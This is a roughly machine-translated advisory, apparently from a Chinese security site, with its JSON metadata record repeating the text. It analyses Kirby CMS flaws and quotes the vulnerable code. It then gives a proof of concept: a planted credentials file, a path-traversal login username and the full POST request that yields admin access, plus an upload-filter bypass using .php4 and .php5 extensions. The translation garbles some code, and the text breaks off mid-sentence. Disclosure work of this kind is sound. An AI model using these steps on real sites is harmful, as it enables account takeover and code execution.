Kirby CMS multi-vulnerability analysis-vulnerability warning-the black bar safety net
2015-09-10T00:00:00
ID MYHACK58:62201566783 Type myhack58 Reporter 佚名 Modified 2015-09-10T00:00:00
Description
Kirby CMS is an easy to use, easy to install and setup is very flexible CMS system, no database support, the use of file system storage. Support Markdown grammar, templates and plug-ins.
Vulnerability details
In Kirby CMS found two vulnerabilities:
1. By path traversal authentication bypass
2. The CSRF upload and PHP script execution
By path traversal authentication bypass
KirbyCMS which has a vulnerability that allows attacker to save/read a hosted environment directory contents.
Due to the KirbyCMS is a file-based content management system, in the accounts directory, it also stores the authentication data file, each user has its belongs to its own password file, named something like: kirby/site/accounts/[username]. php
At the login screen, KirbyCMS reference the password file to verify the password hash. In this process, it can not verify that the generated path, and that does not contain the traversal path in the sequence, such as that provided by the user login variable in the‘../’
This will cause it to generate a path traversal vulnerability, if the attacker for the same multi-user hosting environment then you can bypass authentication, and the/tmp and other common directories written to the file.
The exploit code exists in the kirby/core/user. php file:
abstract class UserAbstract {
protected $username = null;
protected $cache = array();
protected $data = null;
public function __construct($username) {
$this->username = str::lower($username);
// check if the account file exists
if(! file_exists($this->file())) {
throw new Exception('The user account could not be found');
}
...
}
protected function file() {
return kirby::instance()->roots()->accounts() . DS . $this->username() . '. php';
}
In addition, we try to bypass the authentication when found KirbyCMS allowed to pass through HTTP Protocol for authentication, and the authentication session has not ended.
Proof-of-concept
KirbyCMS the credentials in a PHP file is saved in the kirby/site/accounts directory, to prevent the server through the network to directly access content.
The credentials file like this:
php if(! defined('KIRBY')) exit ?& gt;
username: victim
email: victim@mailserver.com
password: >
$2a$1 0$B3DQ5e40XQOSUDSrA4AnxeolXJNDBb5Kbnfkocklajznvdu7iuqpc
language: en
role: admin
A bit has the same hosting environment account of the attacker in order to bypass the authentication, the above credentials the content including the encrypted password hash written to a public directory, 比如/tmp/bypassauth.php
Due to the path traversal vulnerability, an attacker can use these credentials as the administrator, log(http://victim-server.com/kirby/panel/login)
Username: ../../../../../../../../tmp/bypassauth
Password: trythisout
Will then generate a HTTP POST request, similar to:
POST /kirby/panel/login HTTP/1.1
Host: victim_kirby_site
Cookie: PHPSESSID=mqhncr49bpbgnt9kqrp055v7r6; kirby=58eddb6...
Content-Length: 1 4 9
username=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fbypassauth&password=trythisout&_csfr=erQ1UvOm2L1...
This will cause the KirbyCMS from path/sites/victim/kirby/site/accounts/../../../../../../../../tmp/bypassauth.php loaded credentials.
Finally, the attacker can obtain the following response:
class="hgroup hgroup-single-line cf">
class="hgroup-title">
href="#/users/edit/../../../../../../../../tmp/bypassauth">Your account
class="hgroup-options shiv shiv-dark shiv-left">
Successfully get to KirbyCMS management panel admin permissions
The CSRF upload and PHP script execution
KirbyCMS there is a vulnerability allowing to upload usually does not allow the PHP script file, this drain can only be had through the authentication of the user using the, and administrator privileges are not required.
In addition, KirbyCMS there is another vulnerability--CSRF-site request forgery if an attacker convinces a user to visit a phishing site, which may lead the attacker to use an already authenticated user to perform file upload operation. This will cause an unauthenticated attacker to modify or upload content.
The combination of these two vulnerabilities, we can execute arbitrary PHP code.
PHP script execution
KirbyCMS in addition to allows administrators to upload content, but also can run into the admin backend of low-privilege users to upload content. The upload function allows to upload images and other media files.
KirbyCMS in to save the uploaded file before performing the following filtering operation:
protected function checkUpload($file, $blueprint) {
if(via strtolower($file->extension()) == kirby()->option('the content. file. extension', 'txt')) {
throw new Exception('Content files cannot be uploaded');
} else if(via strtolower($file->extension()) == 'php' or
in_array($file->mime(), f::$mimes['php'])) {
throw new Exception('PHP files cannot be uploaded');
} else if(via strtolower($file->extension()) == 'html' or
$file->mime() == 'text/html') {
throw new Exception('the HTML files cannot be uploaded');
...
}
We can see its detecting PHP files, just look at the file's suffix name is“. PHP”, or if you find a file's MIME type is defined for the PHP. If these two conditions are met, KirbyCMS will stop the upload function.
Unfortunately, the two detection options are very easy to bypass.
A lot of server configuration, for example Ubuntu or Debian the PHP script suffix can be:. php, . php4, . php5 is. Simply place a malicious PHP script suffix was changed to. php4, . php5 can be bypassed. MIME-type detection only in the
{"type": "myhack58", "edition": 1, "title": "Kirby CMS multi-vulnerability analysis-vulnerability warning-the black bar safety net", "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "3d7fe47c2a2a3fe346bd1dd178cf360e"}, {"key": "href", "hash": "a640695cf7bef24dc48dbbed3bf7a795"}, {"key": "modified", "hash": "5330f2dfbec49fa73a3aea15fc1579fa"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "5330f2dfbec49fa73a3aea15fc1579fa"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "645396391020478112635e14b34a0f8b"}, {"key": "title", "hash": "ce12a1f80d21e79e3b63bd37f37d8975"}, {"key": "type", "hash": "0665a8b0792e65b50ab13aef58a018dc"}], "references": [], "bulletinFamily": "info", "published": "2015-09-10T00:00:00", "lastseen": "2016-11-08T21:23:57", "history": [], "modified": "2015-09-10T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2015/66783.htm", "hash": "04cbbeb6655fc41ba2b3e3b3037478092524fce304ce7149e5d006c64fd78424", "viewCount": 6, "objectVersion": "1.2", "reporter": "\u4f5a\u540d", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-11-08T21:23:57"}, "dependencies": {"references": [], "modified": "2016-11-08T21:23:57"}, "vulnersScore": 0.0}, "cvelist": [], "id": "MYHACK58:62201566783", "description": "Kirby CMS is an easy to use, easy to install and setup is very flexible CMS system, no database support, the use of file system storage. Support Markdown grammar, templates and plug-ins. \nVulnerability details \nIn Kirby CMS found two vulnerabilities: \n1. By path traversal authentication bypass \n2. The CSRF upload and PHP script execution \nBy path traversal authentication bypass \nKirbyCMS which has a vulnerability that allows attacker to save/read a hosted environment directory contents. \nDue to the KirbyCMS is a file-based content management system, in the accounts directory, it also stores the authentication data file, each user has its belongs to its own password file, named something like: kirby/site/accounts/[username]. php \nAt the login screen, KirbyCMS reference the password file to verify the password hash. In this process, it can not verify that the generated path, and that does not contain the traversal path in the sequence, such as that provided by the user login variable in the\u2018../\u2019 \nThis will cause it to generate a path traversal vulnerability, if the attacker for the same multi-user hosting environment then you can bypass authentication, and the/tmp and other common directories written to the file. \nThe exploit code exists in the kirby/core/user. php file: \nabstract class UserAbstract { \nprotected $username = null; \nprotected $cache = array(); \nprotected $data = null; \npublic function __construct($username) { \n$this->username = str::lower($username); \n// check if the account file exists \nif(! file_exists($this->file())) { \nthrow new Exception('The user account could not be found'); \n} \n... \n} \nprotected function file() { \nreturn kirby::instance()->roots()->accounts() . DS . $this->username() . '. php'; \n} \nIn addition, we try to bypass the authentication when found KirbyCMS allowed to pass through HTTP Protocol for authentication, and the authentication session has not ended. \nProof-of-concept \nKirbyCMS the credentials in a PHP file is saved in the kirby/site/accounts directory, to prevent the server through the network to directly access content. \nThe credentials file like this: \nphp if(! defined('KIRBY')) exit ?& gt; \nusername: victim \nemail: victim@mailserver.com \npassword: > \n$2a$1 0$B3DQ5e40XQOSUDSrA4AnxeolXJNDBb5Kbnfkocklajznvdu7iuqpc \nlanguage: en \nrole: admin \nA bit has the same hosting environment account of the attacker in order to bypass the authentication, the above credentials the content including the encrypted password hash written to a public directory, \u6bd4\u5982/tmp/bypassauth.php \nDue to the path traversal vulnerability, an attacker can use these credentials as the administrator, log(http://victim-server.com/kirby/panel/login) \nUsername: ../../../../../../../../tmp/bypassauth \nPassword: trythisout \nWill then generate a HTTP POST request, similar to: \nPOST /kirby/panel/login HTTP/1.1 \nHost: victim_kirby_site \nCookie: PHPSESSID=mqhncr49bpbgnt9kqrp055v7r6; kirby=58eddb6... \nContent-Length: 1 4 9 \nusername=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fbypassauth&password=trythisout&_csfr=erQ1UvOm2L1... \nThis will cause the KirbyCMS from path/sites/victim/kirby/site/accounts/../../../../../../../../tmp/bypassauth.php loaded credentials. \nFinally, the attacker can obtain the following response: \nclass=\"hgroup hgroup-single-line cf\"> \nclass=\"hgroup-title\"> \nhref=\"#/users/edit/../../../../../../../../tmp/bypassauth\">Your account \nclass=\"hgroup-options shiv shiv-dark shiv-left\"> \nSuccessfully get to KirbyCMS management panel admin permissions \nThe CSRF upload and PHP script execution \nKirbyCMS there is a vulnerability allowing to upload usually does not allow the PHP script file, this drain can only be had through the authentication of the user using the, and administrator privileges are not required. \nIn addition, KirbyCMS there is another vulnerability--CSRF-site request forgery if an attacker convinces a user to visit a phishing site, which may lead the attacker to use an already authenticated user to perform file upload operation. This will cause an unauthenticated attacker to modify or upload content. \nThe combination of these two vulnerabilities, we can execute arbitrary PHP code. \nPHP script execution \nKirbyCMS in addition to allows administrators to upload content, but also can run into the admin backend of low-privilege users to upload content. The upload function allows to upload images and other media files. \nKirbyCMS in to save the uploaded file before performing the following filtering operation: \nprotected function checkUpload($file, $blueprint) { \nif(via strtolower($file->extension()) == kirby()->option('the content. file. extension', 'txt')) { \nthrow new Exception('Content files cannot be uploaded'); \n} else if(via strtolower($file->extension()) == 'php' or \nin_array($file->mime(), f::$mimes['php'])) { \nthrow new Exception('PHP files cannot be uploaded'); \n} else if(via strtolower($file->extension()) == 'html' or \n$file->mime() == 'text/html') { \nthrow new Exception('the HTML files cannot be uploaded'); \n... \n} \nWe can see its detecting PHP files, just look at the file's suffix name is\u201c. PHP\u201d, or if you find a file's MIME type is defined for the PHP. If these two conditions are met, KirbyCMS will stop the upload function. \nUnfortunately, the two detection options are very easy to bypass. \nA lot of server configuration, for example Ubuntu or Debian the PHP script suffix can be:. php, . php4, . php5 is. Simply place a malicious PHP script suffix was changed to. php4, . php5 can be bypassed. MIME-type detection only in the \n\n\n**[1] [[2]](<66783_2.htm>) [next](<66783_2.htm>)**\n"}